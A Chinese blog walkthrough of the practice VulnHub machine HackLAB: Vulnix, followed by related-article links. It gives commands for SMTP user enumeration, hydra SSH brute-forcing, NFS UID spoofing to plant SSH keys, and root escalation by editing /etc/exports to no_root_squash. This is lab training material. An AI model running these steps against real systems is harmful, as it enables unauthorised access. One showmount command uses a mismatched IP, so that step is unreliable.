HackLAB:Vulnix详细解答,保姆级教学

于 2025-02-19 22:39:18 发布
阅读量282 收藏 7
点赞数 4
文章标签: linux 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43433141/article/details/145740888
版权

一、主机发现

arp-scan -l

靶机地址为192.168.55.151

二、端口扫描、目录枚举、指纹识别

2.1端口扫描

nmap -p- 192.168.55.151

2.2目录枚举

由于靶机没有开放80端口,访问不到页面,所以无法进行目录枚举,且无法在web页面进行信息收集

2.3指纹识别

nmap 192.168.55.151 -sV -sC -O --version-all

三、寻找漏洞,获得低权限用户

刚刚端口识别时发现此靶机很多服务都是开放的

大多是邮件服务,其中25端口开放了smtp服务,2049端口开放了NFS挂载服务,这是一个重要发现

3.1smtp用户枚举

若服务器未禁用某些特殊命令,则可以利用这些特殊命令枚举用户,主要是MAIL FROM、RCPT TO、ETRN、VRFY指令。

刚刚的指纹识别中,发现smtp没有禁用VRFY指令,可以进行用户名枚举

smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.55.151

smtp-user-enum是使用Perl编写的工具,其原理就是通过命令枚举用户账户!

-M   #用于猜测用户名 EXPN、VRFY 或 RCPT 的方法(默认值:VRFY)

-U   #通过 smtp 服务检查的用户名文件

-t   #host 服务器主机运行 smtp 服务

先将用户名复制到桌面上的user文件中,随后使用cut命令进行提取用户名

cat user | cut -d ' ' -f2 >user1

提取出的用户名在user1中

然后我们使用finger命令检验用户是否真实存在

finger user@192.168.55.151

经过验证,只用user和root两个用户真实存在

3.2NFS挂载共享文件夹

showmount -e 192.168.55.151

说明靶机中的/home/vulnix目录可以共享

随后我们在本机进行搭建同样的目录

mkdir /tmp/nfs/

mount -t nfs 192.168.55.151:/home/vulnix /tmp/nfs/

cd /tmp/nfs

可以看出其实共享已经实现,估计设置了root_squash标志,不允许我们去访问,只允许vulnix用户去访问,目前只允许vulnix用户登陆,并且得具有与目标上相同的id和gid!

3.3使用hydra爆破ssh密码

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.55.151 ssh

-l user:-l 选项用于指定要破解的用户名,这里指定的用户名为 user。

爆破出密码是letmein

使用ssh进行登陆

ssh user@192.168.55.151

四、提权

4.1靶机内进行信息收集

查看vulnix用户的UID

cat /etc/passwd

4.2登陆vulnix用户

在kali本地创建UID为2008的用户

useradd -u 2008 vulnix
df #查看挂载
su vulnix
cd /tmp/nfs
ls -la

成功进入共享目录中

在/tmp/nfs/.ssh目录生成SSH密钥(无密码)

mkdir .ssh
cd .ssh
ssh-keygen -t rsa

    ./id_rsa,密码为空

因此我们在/tmp/.ssh文件夹中将id_rsa.pub重命名为authorized_keys,将私钥放到/tmp/id_rsa(本地中),然后修改私钥权限

mv id_rsa.pub authorized_keys
mv id_rsa /tmp/id_rsa
chmod 600 /tmp/id_rsa

做好上述步骤后,我们另开一个终端进行vulnix账户的登陆

ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i /tmp/id_rsa vulnix@192.168.55.151

4.3挂载root目录进行提权

想到修改共享目录,挂载root共享目录进行提权

使用以下命令进行修改

sudoedit /etc/exports
解释:
root_squash:客户端的root用户映射到任何人:客户端无法使用setuid位将恶意软件留给他人执行。

no_root_squash:通过此选项,停用了此安全功能,从而允许客户端的root权限操作最终以root身份出现在导出的文件系统中(因此,在其余客户端中)

注:ctrl+x再输入y进行退出

重启靶机,使得配置生效

查看是否挂载root目录

showmount -e 192.168.20.157

成功挂载!

下面进行登陆root用户(跟刚刚登陆vulnix相同)

mkdir /tmp/nfs2/
mount -t nfs 192.168.55.151:/root /tmp/nfs2/
cd /tmp/nfs2

mkdir .ssh

cd .ssh

ssh-keygen -t rsa

    ./id_rsa2 密码空(同样两次回车)

继续进行修改密钥

mv id_rsa2.pub authorized_keys
mv id_rsa2 /tmp/id_rsa2
chmod 600 /tmp/id_rsa2

最后使用私钥进行登陆root账户

ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i /tmp/id_rsa2 root@192.168.55.151

提权成功!

泷羽Sec-pp
关注
Vulnhub靶机:HackLAB_Vulnix
qq_48904485的博客
03-23 1091
运行环境:Virtualbox(攻击机)和VMware(靶机)攻击机:kali(192.168.56.101)靶机:HackLAB: Vulnix(192.168.56.110)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/
HackLab平台示例代码解析——@NodeMCU篇-(四)连接阿里云物联网平台
STAR_LORD
04-14 2005
注释还算挺多的 #include <ESP8266WiFi.h> #include <ArduinoJson.h> #include <aliyun_mqtt.h> #define WIFI_SSID "Tenda_12E9E0" #define WIFI_PASSWD "88889999" // 阿里云三元组 #define PRODUCT...
Hacklab WebIDE在线调试ESP32笔记
weixin_30466953的博客
08-15 799
目录 1.什么是Hacklab WebIDE 1.1 优势 1.2 趋势 2. 使用方法 2.1 功能介绍 2.2 编译第一个程序 2.3 搭建esp32的开发环境 2.4 建立开发板与云平台的连接 ...
【甄选靶场】Vulnhub百个项目渗透——项目二十一HACKLAB_VULNIX(NFS挂载,ssh毒化)
人间体佐菲的博客
09-22 914
Vulnhub百个项目渗透——项目二十一:HACKLAB_VULNIX(NFS挂载,ssh毒化)网络安全,信息安全,渗透测试
vulnix靶机攻略
qq_58683895的博客
10-17 267
为什么使用这些命令,可以在hacktricks上查阅这里感觉可能有用的也就user和root。
oscp备考,oscp系列——hacklab-vulnix靶场:smtp用户名枚举,finger协议,ssh爆破,nfs挂载,ssh公钥写入,nsf提权
最新发布
2202_75361164的博客
02-05 899
oscp备考,oscp系列——hacklab-vulnix靶场:smtp用户名枚举,finger协议,ssh爆破,nfs挂载,ssh公钥写入,nsf提权难度简单偏上对于低权限shell获取涉及:smtp用户名枚举,finger协议,ssh爆破,nfs挂载,ssh公钥写入对于提权:nsf提权。
小白的靶机VulnHub-Vulnix
wo41ge的博客
01-18 667
靶机地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/ 开机界面就是个这 确定本次靶机的IP地址:192.168.106.132 可以看到的 开放了很多的端口 现在 就25端口 进行渗透 在端口25SMTP栏下我们看到VRFY(用于验证指定的用户/邮箱是否存在;由于安全原因,服务器常禁止此命令)没有被禁用 从SMTP入手;使用工具smtp-user-enum枚举用户(此处用VRFY方式);(也可以用metasploit辅助模块:smtp_enum)此
proyectoaceu:HackLab ITM 的 ACEU 网站项目
06-08
在“proyectoaceu: HackLab ITM 的 ACEU 网站项目”中,我们看到的是一个专门针对 HackLab ITM 的 ACEU(可能代表某个组织或活动)的网站开发项目。这个项目的核心是使用 CSS(层叠样式表)来设计和构建网页的视觉...
webo:hacklab Almería 社区的旧网站
06-21
"webo:hacklab Almería 社区的旧网站" 这个标题表明我们正在处理的是一个与"hacklab Almería"社区相关的旧版网站资源。"webo"可能是该网站的简称或者项目名,而"Almería"则可能指的是西班牙的一个城市,因为那里...
Vulnhub靶场篇:Vulnix
夜车星繁的博客
05-14 2538
VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 靶机IP:192.168.223.133 首先进行信息收集: nmap -sS -sV -T4 -A -p- 192.168.223.133 可以看到此靶机开放了众多端口服务;SSH、FTP、Finger、POP3、NFS等 另外在端口25SMTP栏下我们看到VRFY(用于验证指定的用户/邮箱是否存在;由于安全原因,服务器常禁止此命令)没有被禁用 从SMTP入手;使用工具smtp-user...
vulnix, 用于 nix/nixos的漏洞( 书钉) 扫描器.zip
09-19
vulnix, 用于 nix/nixos的漏洞( 书钉) 扫描器 Nix(OS) 漏洞扫描器这是一个实用程序,用于验证从实现路径可以访问的任何软件包,并可以能受到列表中的漏洞影响。它实现了一个CLI实用程序来检查当前状态和Sensu的监控集成。示例输出:Found 5 advisor
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
Vulnhub-靶机-HackLAB: Vulnix
qq_43264813的博客
03-05 1348
Vulnhub—靶机—HackLAB: Vulnix 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/ 文章目录Vulnhub—靶机—HackLAB: Vulnix一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址并对目标靶机进行全端口扫描: 【命令】nmap -n -sV -p- 192.168
Android官方建议关于Android APP UI界面设计的一些参考原则
一个IT人的技术成长历程。
01-16 1460
下面是来自于Android官网给出了关于Android APP UI界面设计的一些参考原则,希望对广大ui设计师能带来帮助,尤其是在进行Andriod相关界面设计的时候。   一、清晰是UI界面第一位,也是最重要的目标。   只有清楚的知道你设计的UI界面是什么,明白为什么要用它,理解界面是如何帮助他们交互的,预测用它会发生什么。人们才可能高效的利用它。模糊和迷惑的UI界面使得用户连疑问的...
Nix/NixOS 安全漏洞扫描器 —— vulnix 项目推荐
gitblog_00208的博客
01-13 389
Nix/NixOS 安全漏洞扫描器 —— vulnix 项目推荐 vulnix Vulnerability (CVE) scanner for Nix/NixOS. 项目地址: https://gitcode.com/gh_mir...
[Vulnhub]Vulnix 通过NFS挂载+SSH公钥免密登录权限提升
05-26 1000
sudoedet是一个使用root权限安全编辑文件的命令。它允许您在不直接进入超用户模式的情况下编辑系统文件。
Vulnix 开源项目教程
gitblog_00060的博客
09-01 414
Vulnix 开源项目教程 vulnixVulnerability (CVE) scanner for Nix/NixOS.项目地址:https://gitcode.com/gh_mirrors/vu/vulnix 1. 项目的目录结构及介绍 Vulnix 是一个用于 Nix/NixOS 的漏洞(CVE)扫描器。以下是其主要目录结构及其功能介绍: vulnix/ ├── bin/ │ └──...
探索安全新境界:Nix OS的守护者——vulnix
gitblog_00576的博客
08-30 996
探索安全新境界:Nix OS的守护者——vulnix vulnixVulnerability (CVE) scanner for Nix/NixOS.项目地址:https://gitcode.com/gh_mirrors/vu/vulnix 在开源世界中,安全性始终是绕不开的话题。对于那些基于Nix或NixOS的项目来说,一款名为vulnix的强大工具正等待着成为你的系统安全卫士。今天,我们深入...
Hacklab内部网:使用React和npm进行项目开发与部署
"Hacklab内部网"这一标题可能指向的是一个专为黑客实验室或技术社区内部使用的网络系统,旨在促进成员间的交流、协作和资源共享。Hacklab往往是一个物理空间,供黑客、程序员和艺术家聚集、共享知识和进行项目合作。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值